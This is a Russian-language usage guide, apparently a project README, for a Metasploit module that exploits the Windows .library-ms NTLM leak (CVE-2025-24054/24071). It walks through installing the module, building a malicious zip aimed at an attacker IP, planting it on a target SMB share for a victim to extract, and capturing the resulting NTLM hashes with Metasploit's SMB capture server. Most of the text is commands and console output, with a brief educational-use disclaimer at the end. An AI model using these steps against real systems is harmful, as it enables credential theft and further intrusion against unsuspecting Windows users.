
Модуль Metasploit для эксплуатации CVE-2025-24054 (ex 24071). Эксплойт утечки NTLM, встроенный в Metasploit, для векторов атак на основе библиотек Windows.
Уязвимость возникает в процессе распаковки файла .zip. При взаимодействии со специально созданным файлом .library-ms проводник Windows обрабатывает внутреннюю XML-схему и автоматически инициирует SMB-запрос аутентификации к удалённому пути, контролируемому атакующим.
Это поведение позволяет перехватить NTLM-хэш пользователя без какого-либо дополнительного взаимодействия, кроме распаковки файла. Чтобы посмотреть proof-of-concept, рекомендую перейти по ссылке: Fluffy - HTB.
Хотя изначально эта уязвимость распространялась как CVE-2025-24071, в настоящее время она официально отслеживается как CVE-2025-24054.
Клонируйте репозиторий:
❯ git clone https://github.com/SecurityLayer404/CVE-2025-24054-24071---Metasploit-Module.git
❯ cd CVE-2025-24071
Скопируйте модуль в каталог Metasploit:
❯ cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/
Если каталог не существует, создайте его:
❯ mkdir -p ~/.msf4/modules/auxiliary/server/
Затем снова скопируйте модуль.
Запустите Metasploit и загрузите модуль:
❯ msfconsole -q
❯ use auxiliary/server/ntlm_hash_leak
Если модуль загрузился успешно, вы увидите настройки для его конфигурации:
❯ show options
Module options (auxiliary/server/ntlm_hash_leak):
Name Current Setting Required Description
---- --------------- -------- -----------
ATTACKER_IP yes IP атакующего (где запущен Responder/Impacket)
FILENAME exploit.zip yes Имя ZIP-файла
LIBRARY_NAME documents.library-ms yes Имя файла .library-ms
SHARE_NAME recurso yes Имя фиктивного общего ресурса
Настройте модуль и выполните:
❯ set ATTACKER_IP 0.0.0.0 # Замените на ваш IP атакующего
❯ set FILENAME exploit.zip # Имя полезной нагрузки, которую вы загрузите на SMB (целевая машина)
❯ set LIBRARY_NAME malicious.library-ms # Имя файла .library-ms
❯ set SHARE_NAME it_shared # Имя SMB-ресурса
❯ run
Результат: модуль создаёт файл .zip, который необходимо загрузить на целевой SMB-сервер для последующего выполнения жертвой
[+] exploit.zip stored at /home/user/.msf4/local/exploit.zip
[+] Архив сохранён: /home/user/.msf4/local/exploit.zip
[*] Auxiliary module execution completed
Наконец, используйте модуль захвата SMB из Metasploit для получения NTLM-хэшей:
❯ use auxiliary/server/capture/smb
❯ set SRVHOST 0.0.0.0 # Замените на ваш IP атакующего
❯ run
Если у вас возникли проблемы с запуском SMB-сервера из Metasploit:
Этот модуль разработан исключительно в образовательных целях и для проведения авторизованных тестов. Несанкционированное использование подобных инструментов может быть незаконным.
Security Layer